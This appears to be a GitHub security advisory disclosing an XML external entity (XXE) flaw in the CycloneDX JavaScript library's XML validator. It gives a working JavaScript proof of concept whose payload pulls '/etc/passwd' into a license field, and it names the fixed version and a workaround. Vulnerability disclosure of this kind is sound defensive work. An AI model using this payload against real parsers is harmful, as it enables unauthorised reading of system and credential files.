@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Impact

XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.

POC

const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});

Patches

This issue was fixed in @cyclonedx/cyclonedx-library@6.7.1 .

Workarounds

Do not run the provided XML validator on untrusted inputs.

References

issue was introduced via CycloneDX/cyclonedx-javascript-library#1063.

References

jkowalleck published to CycloneDX/cyclonedx-javascript-library May 8, 2024

Published to the GitHub Advisory Database May 8, 2024

Reviewed May 8, 2024

Published by the National Vulnerability Database May 14, 2024

Last updated May 14, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Impact

POC

Patches

Workarounds

References

References

Severity

CVSS base metrics

Weaknesses

CVE ID

GHSA ID

Source code

Credits